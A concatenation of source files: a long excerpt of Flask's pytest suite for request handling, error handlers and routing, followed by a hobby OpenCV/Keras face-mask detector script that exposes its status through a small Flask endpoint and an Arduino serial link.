def test_teardown_request_handler_debug_mode(app, client):
called = []
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route("/")
def root():
return "Response"
rv = client.get("/")
assert rv.status_code == 200
assert b"Response" in rv.data
assert len(called) == 1
def test_teardown_request_handler_error(app, client):
called = []
app.testing = False
@app.teardown_request
def teardown_request1(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.teardown_request
def teardown_request2(exc):
assert type(exc) == ZeroDivisionError
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError()
except Exception:
pass
@app.route("/")
def fails():
1 // 0
rv = client.get("/")
assert rv.status_code == 500
assert b"Internal Server Error" in rv.data
assert len(called) == 2
def test_before_after_request_order(app, client):
called = []
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route("/")
def index():
return "42"
rv = client.get("/")
assert rv.data == b"42"
assert called == [1, 2, 3, 4, 5, 6]
def test_error_handling(app, client):
app.testing = False
@app.errorhandler(404)
def not_found(e):
return "not found", 404
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.errorhandler(Forbidden)
def forbidden(e):
return "forbidden", 403
@app.route("/")
def index():
flask.abort(404)
@app.route("/error")
def error():
1 // 0
@app.route("/forbidden")
def error2():
flask.abort(403)
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"not found"
rv = client.get("/error")
assert rv.status_code == 500
assert b"internal server error" == rv.data
rv = client.get("/forbidden")
assert rv.status_code == 403
assert b"forbidden" == rv.data
def test_error_handler_unknown_code(app):
with pytest.raises(KeyError) as exc_info:
app.register_error_handler(999, lambda e: ("999", 999))
assert "Use a subclass" in exc_info.value.args[0]
def test_error_handling_processing(app, client):
app.testing = False
@app.errorhandler(500)
def internal_server_error(e):
return "internal server error", 500
@app.route("/")
def broken_func():
1 // 0
@app.after_request
def after_request(resp):
resp.mimetype = "text/x-special"
return resp
resp = client.get("/")
assert resp.mimetype == "text/x-special"
assert resp.data == b"internal server error"
def test_baseexception_error_handling(app, client):
app.testing = False
@app.route("/")
def broken_func():
raise KeyboardInterrupt()
with pytest.raises(KeyboardInterrupt):
client.get("/")
ctx = flask._request_ctx_stack.top
assert ctx.preserved
assert type(ctx._preserved_exc) is KeyboardInterrupt
def test_before_request_and_routing_errors(app, client):
@app.before_request
def attach_something():
flask.g.something = "value"
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = client.get("/")
assert rv.status_code == 404
assert rv.data == b"value"
def test_user_error_handling(app, client):
class MyException(Exception):
pass
@app.errorhandler(MyException)
def handle_my_exception(e):
assert isinstance(e, MyException)
return "42"
@app.route("/")
def index():
raise MyException()
assert client.get("/").data == b"42"
def test_http_error_subclass_handling(app, client):
class ForbiddenSubclass(Forbidden):
pass
@app.errorhandler(ForbiddenSubclass)
def handle_forbidden_subclass(e):
assert isinstance(e, ForbiddenSubclass)
return "banana"
@app.errorhandler(403)
def handle_403(e):
assert not isinstance(e, ForbiddenSubclass)
assert isinstance(e, Forbidden)
return "apple"
@app.route("/1")
def index1():
raise ForbiddenSubclass()
@app.route("/2")
def index2():
flask.abort(403)
@app.route("/3")
def index3():
raise Forbidden()
assert client.get("/1").data == b"banana"
assert client.get("/2").data == b"apple"
assert client.get("/3").data == b"apple"
def test_errorhandler_precedence(app, client):
class E1(Exception):
pass
class E2(Exception):
pass
class E3(E1, E2):
pass
@app.errorhandler(E2)
def handle_e2(e):
return "E2"
@app.errorhandler(Exception)
def handle_exception(e):
return "Exception"
@app.route("/E1")
def raise_e1():
raise E1
@app.route("/E3")
def raise_e3():
raise E3
rv = client.get("/E1")
assert rv.data == b"Exception"
rv = client.get("/E3")
assert rv.data == b"E2"
def test_trapping_of_bad_request_key_errors(app, client):
@app.route("/key")
def fail():
flask.request.form["missing_key"]
@app.route("/abort")
def allow_abort():
flask.abort(400)
rv = client.get("/key")
assert rv.status_code == 400
assert b"missing_key" not in rv.data
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = True
with pytest.raises(KeyError) as e:
client.get("/key")
assert e.errisinstance(BadRequest)
assert "missing_key" in e.value.get_description()
rv = client.get("/abort")
assert rv.status_code == 400
app.debug = False
app.config["TRAP_BAD_REQUEST_ERRORS"] = True
with pytest.raises(KeyError):
client.get("/key")
with pytest.raises(BadRequest):
client.get("/abort")
def test_trapping_of_all_http_exceptions(app, client):
app.config["TRAP_HTTP_EXCEPTIONS"] = True
@app.route("/fail")
def fail():
flask.abort(404)
with pytest.raises(NotFound):
client.get("/fail")
def test_error_handler_after_processor_error(app, client):
app.testing = False
@app.before_request
def before_request():
if _trigger == "before":
1 // 0
@app.after_request
def after_request(response):
if _trigger == "after":
1 // 0
return response
@app.route("/")
def index():
return "Foo"
@app.errorhandler(500)
def internal_server_error(e):
return "Hello Server Error", 500
for _trigger in "before", "after":
rv = client.get("/")
assert rv.status_code == 500
assert rv.data == b"Hello Server Error"
def test_enctype_debug_helper(app, client):
from flask.debughelpers import DebugFilesKeyError
app.debug = True
@app.route("/fail", methods=["POST"])
def index():
return flask.request.files["foo"].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with client:
with pytest.raises(DebugFilesKeyError) as e:
client.post("/fail", data={"foo": "index.txt"})
assert "no file contents were transmitted" in str(e.value)
assert "This was submitted: 'index.txt'" in str(e.value)
def test_response_types(app, client):
@app.route("/text")
def from_text():
return "Hällo Wörld"
@app.route("/bytes")
def from_bytes():
return "Hällo Wörld".encode()
@app.route("/full_tuple")
def from_full_tuple():
return (
"Meh",
400,
{"X-Foo": "Testing", "Content-Type": "text/plain; charset=utf-8"},
)
@app.route("/text_headers")
def from_text_headers():
return "Hello", {"X-Foo": "Test", "Content-Type": "text/plain; charset=utf-8"}
@app.route("/text_status")
def from_text_status():
return "Hi, status!", 400
@app.route("/response_headers")
def from_response_headers():
return (
flask.Response(
"Hello world", 404, {"Content-Type": "text/html", "X-Foo": "Baz"}
),
{"Content-Type": "text/plain", "X-Foo": "Bar", "X-Bar": "Foo"},
)
@app.route("/response_status")
def from_response_status():
return app.response_class("Hello world", 400), 500
@app.route("/wsgi")
def from_wsgi():
return NotFound()
@app.route("/dict")
def from_dict():
return {"foo": "bar"}, 201
assert client.get("/text").data == "Hällo Wörld".encode()
assert client.get("/bytes").data == "Hällo Wörld".encode()
rv = client.get("/full_tuple")
assert rv.data == b"Meh"
assert rv.headers["X-Foo"] == "Testing"
assert rv.status_code == 400
assert rv.mimetype == "text/plain"
rv = client.get("/text_headers")
assert rv.data == b"Hello"
assert rv.headers["X-Foo"] == "Test"
assert rv.status_code == 200
assert rv.mimetype == "text/plain"
rv = client.get("/text_status")
assert rv.data == b"Hi, status!"
assert rv.status_code == 400
assert rv.mimetype == "text/html"
rv = client.get("/response_headers")
assert rv.data == b"Hello world"
assert rv.content_type == "text/plain"
assert rv.headers.getlist("X-Foo") == ["Bar"]
assert rv.headers["X-Bar"] == "Foo"
assert rv.status_code == 404
rv = client.get("/response_status")
assert rv.data == b"Hello world"
assert rv.status_code == 500
rv = client.get("/wsgi")
assert b"Not Found" in rv.data
assert rv.status_code == 404
rv = client.get("/dict")
assert rv.json == {"foo": "bar"}
assert rv.status_code == 201
def test_response_type_errors():
app = flask.Flask(__name__)
app.testing = True
@app.route("/none")
def from_none():
pass
@app.route("/small_tuple")
def from_small_tuple():
return ("Hello",)
@app.route("/large_tuple")
def from_large_tuple():
return "Hello", 234, {"X-Foo": "Bar"}, "???"
@app.route("/bad_type")
def from_bad_type():
return True
@app.route("/bad_wsgi")
def from_bad_wsgi():
return lambda: None
c = app.test_client()
with pytest.raises(TypeError) as e:
c.get("/none")
assert "returned None" in str(e.value)
assert "from_none" in str(e.value)
with pytest.raises(TypeError) as e:
c.get("/small_tuple")
assert "tuple must have the form" in str(e.value)
pytest.raises(TypeError, c.get, "/large_tuple")
with pytest.raises(TypeError) as e:
c.get("/bad_type")
assert "it was a bool" in str(e.value)
pytest.raises(TypeError, c.get, "/bad_wsgi")
def test_make_response(app, req_ctx):
rv = flask.make_response()
assert rv.status_code == 200
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response("Awesome")
assert rv.status_code == 200
assert rv.data == b"Awesome"
assert rv.mimetype == "text/html"
rv = flask.make_response("W00t", 404)
assert rv.status_code == 404
assert rv.data == b"W00t"
assert rv.mimetype == "text/html"
def test_make_response_with_response_instance(app, req_ctx):
rv = flask.make_response(flask.jsonify({"msg": "W00t"}), 400)
assert rv.status_code == 400
assert rv.data == b'{"msg":"W00t"}\n'
assert rv.mimetype == "application/json"
rv = flask.make_response(flask.Response(""), 400)
assert rv.status_code == 400
assert rv.data == b""
assert rv.mimetype == "text/html"
rv = flask.make_response(
flask.Response("", headers={"Content-Type": "text/html"}),
400,
[("X-Foo", "bar")],
)
assert rv.status_code == 400
assert rv.headers["Content-Type"] == "text/html"
assert rv.headers["X-Foo"] == "bar"
def test_jsonify_no_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": False})
compressed_msg = b'{"msg":{"submsg":"W00t"},"msg2":"foobar"}\n'
uncompressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
rv = flask.make_response(flask.jsonify(uncompressed_msg), 200)
assert rv.data == compressed_msg
def test_jsonify_prettyprint(app, req_ctx):
app.config.update({"JSONIFY_PRETTYPRINT_REGULAR": True})
compressed_msg = {"msg": {"submsg": "W00t"}, "msg2": "foobar"}
pretty_response = (
b'{\n "msg": {\n "submsg": "W00t"\n }, \n "msg2": "foobar"\n}\n'
)
rv = flask.make_response(flask.jsonify(compressed_msg), 200)
assert rv.data == pretty_response
def test_jsonify_mimetype(app, req_ctx):
app.config.update({"JSONIFY_MIMETYPE": "application/vnd.api+json"})
msg = {"msg": {"submsg": "W00t"}}
rv = flask.make_response(flask.jsonify(msg), 200)
assert rv.mimetype == "application/vnd.api+json"
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python >= 3.7")
def test_json_dump_dataclass(app, req_ctx):
from dataclasses import make_dataclass
Data = make_dataclass("Data", [("name", str)])
value = flask.json.dumps(Data("Flask"), app=app)
value = flask.json.loads(value, app=app)
assert value == {"name": "Flask"}
def test_jsonify_args_and_kwargs_check(app, req_ctx):
with pytest.raises(TypeError) as e:
flask.jsonify("fake args", kwargs="fake")
assert "behavior undefined" in str(e.value)
def test_url_generation(app, req_ctx):
@app.route("/hello/<name>", methods=["POST"])
def hello():
pass
assert flask.url_for("hello", name="test x") == "/hello/test%20x"
assert (
flask.url_for("hello", name="test x", _external=True)
== "http://localhost/hello/test%20x"
)
def test_build_error_handler(app):
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "spam")
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for("spam")
except BuildError as err:
error = err
try:
raise RuntimeError("Test case where BuildError is not current.")
except RuntimeError:
pytest.raises(BuildError, app.handle_url_build_error, error, "spam", {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return "/test_handler/"
app.url_build_error_handlers.append(handler)
with app.test_request_context():
assert flask.url_for("spam") == "/test_handler/"
def test_build_error_handler_reraise(app):
# Test a custom handler which reraises the BuildError
def handler_raises_build_error(error, endpoint, values):
raise error
app.url_build_error_handlers.append(handler_raises_build_error)
with app.test_request_context():
pytest.raises(BuildError, flask.url_for, "not.existing")
def test_url_for_passes_special_values_to_build_error_handler(app):
@app.url_build_error_handlers.append
def handler(error, endpoint, values):
assert values == {
"_external": False,
"_anchor": None,
"_method": None,
"_scheme": None,
}
return "handled"
with app.test_request_context():
flask.url_for("/")
def test_static_files(app, client):
rv = client.get("/static/index.html")
assert rv.status_code == 200
assert rv.data.strip() == b"<h1>Hello World!</h1>"
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/static/index.html"
rv.close()
def test_static_url_path():
app = flask.Flask(__name__, static_url_path="/foo")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_path_with_ending_slash():
app = flask.Flask(__name__, static_url_path="/foo/")
app.testing = True
rv = app.test_client().get("/foo/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
assert flask.url_for("static", filename="index.html") == "/foo/index.html"
def test_static_url_empty_path(app):
app = flask.Flask(__name__, static_folder="", static_url_path="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_url_empty_path_default(app):
app = flask.Flask(__name__, static_folder="")
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires Python >= 3.6")
def test_static_folder_with_pathlib_path(app):
from pathlib import Path
app = flask.Flask(__name__, static_folder=Path("static"))
rv = app.test_client().open("/static/index.html", method="GET")
assert rv.status_code == 200
rv.close()
def test_static_folder_with_ending_slash():
app = flask.Flask(__name__, static_folder="static/")
@app.route("/<path:path>")
def catch_all(path):
return path
rv = app.test_client().get("/catch/all")
assert rv.data == b"catch/all"
def test_static_route_with_host_matching():
app = flask.Flask(__name__, host_matching=True, static_host="example.com")
c = app.test_client()
rv = c.get("http://example.com/static/index.html")
assert rv.status_code == 200
rv.close()
with app.test_request_context():
rv = flask.url_for("static", filename="index.html", _external=True)
assert rv == "http://example.com/static/index.html"
# Providing static_host without host_matching=True should error.
with pytest.raises(Exception):
flask.Flask(__name__, static_host="example.com")
# Providing host_matching=True with static_folder
# but without static_host should error.
with pytest.raises(Exception):
flask.Flask(__name__, host_matching=True)
# Providing host_matching=True without static_host
# but with static_folder=None should not error.
flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
AssertionError()
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
AssertionError()
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo.bar.baz", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.bar.baz.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.bar.baz.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route("/киртест")
def index():
return "Hello World!"
rv = client.get("/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert "Make sure to directly send your POST-request to this URL" in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View:
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = f"running on {hostname}:{port} ..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == f"running on {hostname}:{port} ..."
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
@require_cpython_gc
def test_app_freed_on_zero_refcount():
# A Flask instance should not create a reference cycle that prevents CPython
# from freeing it when all external references to it are released (see #3761).
gc.disable()
try:
app = flask.Flask(__name__)
assert app.view_functions["static"]
weak = weakref.ref(app)
assert weak() is not None
del app
assert weak() is None
finally:
gc.enable()
|
maskdetector.py
|
#import required libraries
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
from imutils.video import VideoStream
import numpy as np
import argparse
import imutils
import serial
import time
import cv2
import os
import flask
import threading
from flask import request, jsonify
import json
# declare maskStatus json
maskStatus = {}
# define the webserver thread
def webServer():
app = flask.Flask(__name__)
@app.route('/', methods=['GET'])
def webAPI():
return jsonify(maskStatus)
app.run(port=webServerPort, host="0.0.0.0")
# check command-line arguments
parser = argparse.ArgumentParser()
parser.add_argument("--arduino","-a", dest='COM', help="The COM port of the arduino, ex: com4")
parser.add_argument("--port", "-p", dest="PORT", help="Define the port of the web API (default: 5000)")
parser.add_argument("--ipcam", "-ip", dest="IP", help="The URL of the IP Camera ()")
args = parser.parse_args()
#import serial and start serial communication
webServerPort = args.PORT or 5000
if args.COM is not None:
s = serial.Serial(args.COM, 9600, timeout=5)
# start the webserver thread
webServerThread = threading.Thread(target=webServer)
webServerThread.start()
#Simple logger library :D
class Logger:
def info(self,text,idk = False):
print('\033[94m [INFO] '+text+'\033[0m',end='' if idk else '\n')
def ok(self,text,idk = False):
print('\033[92m [OK] '+text+'\033[0m',end='' if idk else '\n')
def warn(self,text,idk = False):
print('\033[93m [WARN] '+text+'\033[0m',end='' if idk else '\n')
def fail(self,text,idk = False):
print('\033[91m [FAIL] '+text+'\033[0m',end='' if idk else '\n')
logger = Logger()
#Loading things up
logger.info("Loading Face Detector... ",True)
faceDetector = cv2.dnn.readNet("./face_detector/deploy.prototxt", "./face_detector/res10_300x300_ssd_iter_140000.caffemodel")
logger.ok("Done")
logger.info("Loading Mask Detector... ")
paths = [os.path.join("./models", path) for path in os.listdir("./models")]
latest = sorted(paths, key=os.path.getmtime)[-1]
logger.info(f"Latest model path: {latest}")
maskDetector = load_model(latest)
logger.ok("Done")
logger.info("Starting video capture...",True)
vs = VideoStream(src=args.IP or 0).start()
time.sleep(2.0)
logger.ok("Done")
#check starting time for fps counting
start = time.time()
while True:
frame=vs.read() #read the camera
if frame is None:
logger.warn("The video frame is None. Check your input.")
time.sleep(1)
continue
frame = imutils.resize(frame, width=400) # resize for better fps
(height, width) = frame.shape[:2]
blob = cv2.dnn.blobFromImage(frame, 1.0, (300,300), (104.0, 177.0, 123.0)) #make a blob from the camera pic for the face detector
#pass the blob through the network
faceDetector.setInput(blob)
detections = faceDetector.forward()
faces = []
locations = []
predictions = []
#process the faces to arrays
for i in range(0, detections.shape[2]):
confidence = detections[0, 0, i, 2]
if confidence > 0.5:
(startX, startY, endX, endY) = np.multiply(
detections[0, 0, i, 3:7],
[width, height, width, height]
).astype("int") #get the bounding box of the face
(startX, startY) = (max(0, startX), max(0, startY))
(endX, endY) = (min(width - 1, endX), min(height - 1, endY))
#grab the face and convert to rgb (because the predictor can only process rgb)
#and resize it
face = frame[startY:endY, startX:endX]
try:
face = cv2.cvtColor(face, cv2.COLOR_BGR2RGB)
except:
logger.warn("!_src.empty() -- Check your input.")
continue
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
faces.append(face)
locations.append((startX, startY, endX, endY))
if len(faces) > 0:
faces = np.array(faces, dtype="float32")
predictions = maskDetector.predict(faces, batch_size=32)
else:
if args.COM is not None:
s.write('2'.encode())
#show fps
fps_str = "FPS: %.2f" % (1 / (time.time() - start))
start = time.time()
cv2.putText(frame, fps_str, (25, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (255,0, 0), 2)
#loop through all faces and add it to the end photo
for (box, preds) in zip(locations, predictions):
(aX, aY, bX, bY) = box
(mask, withoutMask) = preds
havemask = mask > withoutMask
if havemask:
label = "Mask"
color = (0, 255, 0)
maskStatus = {
# "faces": zip(locations, predictions),
"prettyStatus": "Wearing mask",
"shortStatus": True
}
else:
label = "No Mask"
color = (0, 0, 255)
maskStatus = {
# "faces": zip(locations, predictions),
"prettyStatus": "Not wearing mask",
"shortStatus": False
}
#send data to arduino
if args.COM is not None:
s.write('1' if havemask else '0'.encode())
label = "{}: {:.2f}%".format(label, max(mask, withoutMask) * 100)
cv2.putText(frame, label, (aX, aY - 10),cv2.FONT_HERSHEY_SIMPLEX, 0.40, color, 2)
cv2.rectangle(frame, (aX, aY), (bX, bY), color, 2)
#show the frame
cv2.imshow("Mask Detector by davidfegyver", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
cv2.destroyAllWindows()
vs.stop()
|
plant-main.py
|
#!/usr/bin/env python
